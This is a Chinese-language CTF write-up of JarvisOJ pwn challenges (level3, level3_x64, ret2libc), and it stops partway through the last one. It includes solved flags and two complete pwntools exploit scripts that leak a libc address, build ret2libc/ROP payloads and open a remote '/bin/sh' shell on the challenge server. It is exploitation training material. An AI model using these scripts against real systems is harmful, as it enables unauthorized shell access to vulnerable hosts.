level3
CTF{d85346df5770f56f69025bc3f5f1d3d0}
(看了看学长的脚本, 有啥东西就写在注释里了)
# -*- coding: utf-8 -*-
from pwn import *
# from ctypes import string_at
# from sys import getsizeof
# from binascii import hexlify
elf = ELF("./level3")
# io = process("./level3")
io = remote("pwn2.jarvisoj.com",9879)
vul_addr = elf.symbols["vulnerable_function"]
write_addr = elf.symbols["write"]
# write_addr_plt = elf.plt["write"]
# print(write_addr == write_addr_plt) # true
write_addr_got = elf.got["write"]
io.recvline()
# junk ebp 要执行的函数的地址 执行后返回的地址 参数1 参数2 参数3
io.sendline('x'*0x88 + 'beef' + p32(write_addr) + p32(vul_addr) + p32(1) + p32(write_addr_got) + p32(4))
# print(io.recv(4))
write_addr_real = u32(io.recv(4)) # 得到真实地址
# print(write_addr_real)
libc = ELF("./libc-2.19.so")
write_libc_offset = libc.symbols["write"]
sys_libc_offset = libc.symbols["system"]
# 传字符串时是传的字符串地址,所以也要搜到libc里字符串的偏移量才行
binsh_libc_offset = next(libc.search("/bin/sh")) # search返回的是个迭代器,要用next()才能访问到偏移量
libc_base = write_addr_real - write_libc_offset
sys_addr_real = libc_base + sys_libc_offset
binsh_libc_real = libc_base + binsh_libc_offset
io.recvline()
io.sendline('x'*0x88 + 'jjjj' + p32(sys_addr_real) + 'jjjj' + p32(binsh_libc_real))
io.interactive()
# print(hexlify(string_at(write_addr_got, getsizeof(p32(write_addr_got))))) # python可以读取内存内容,但读取别的程序占用的内存会引发段错误
# 而且这玩意读的应该还是本地相应地址的内容,根本不是人服务器上的,我好像过于异想天开了。level3x64
CTF{b1aeaa97fdcc4122533290b73765e4fd}
就算是 64 位的,最终目的还是 system(bin/sh)
64 位区别:
“System V AMD64 ABI (Linux、FreeBSD、macOS 等采用) 中前六个整型或指针参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9 寄存器中,如果还有更多的参数的话才会保存在栈上。”, 以及覆盖一个地址要 8 个字母了。
要给寄存器传参的话,先写一句 pop rxx; ret(的地址),下面接着要写进 rxx 的数值。
还有 payload 顺序也不一样,先改好寄存器的值,再写要调用的函数、调用完返回的地址。
# -*- coding: utf-8 -*-
from pwn import *
elf = ELF("./level3_x64")
# io = process("./level3")
io = remote("pwn2.jarvisoj.com", 9883)
vul_addr = elf.symbols["vulnerable_function"]
write_addr = elf.symbols["write"]
write_addr_got = elf.got["write"]
# ropper --file ./level3_x64 --search "pop | ret"
pop_rdi = p64(0x00000000004006b3) + p64(1) # 1 for stdin
pop_rsi = p64(0x00000000004006b1) + p64(write_addr_got)
pop_rdx = p64(1) # 根本没有pop rdx; ret; 随便填一个,rdx值本来要大于8就行,不大于8也没办法
io.recvline()
# junk ebp (8个) 参数1 参数2 参数3 要执行的函数的地址 执行后返回的地址
io.sendline('x'*0x80 + 'deadbeef' + pop_rdi + pop_rsi + pop_rdx + p64(write_addr) + p64(vul_addr))
write_addr_real = u64(io.recv(8)) # 得到真实地址
libc = ELF("./libc-2.19.so")
write_libc_offset = libc.symbols["write"]
sys_libc_offset = libc.symbols["system"]
binsh_libc_offset = next(libc.search("/bin/sh")) # search返回的是个迭代器,要用next()才能访问到偏移量
libc_base = write_addr_real - write_libc_offset
sys_addr_real = libc_base + sys_libc_offset
binsh_libc_real = libc_base + binsh_libc_offset
pop_rdi_binsh = p64(0x00000000004006b3) + p64(binsh_libc_real)
io.recvline()
io.sendline('x'*0x80 + 'jjjjjjjj' + pop_rdi_binsh + p64(sys_addr_real))
io.interactive()ret2libc
很奇怪每次输入都会改变变量到栈底距离的题,不过因此学到了如何在脚本里关联上 gdb(gdb.attach(io, "b main")),并在 gdb 中直接看要填充多少(distance $eax $ebp)。
首先gdb ret2libc3,b main,r后一路n到要读入的语句:
0x8048683 <main+107> lea eax, [esp + 0x1c]
0x8048687 <main+111> mov dword ptr [esp], eax
0x804868a <main+114> call gets@plt <0x8048440>类似 [ebp - 0x??] 这样的一般是变量地址,这题特殊用 esp 定位,所以lea是“取有效地址”, 感觉可以当做只传地址的 mov?)
执行完distance $eax $ebp得出要填充成垃圾的长度:
0xffffcefc->0xffffcf68 is 0x6c bytes (0x1b words)写进脚本:
仅存的手稿到这里就断了。备份的代码也丢失在时间里,就像雨中的眼泪……
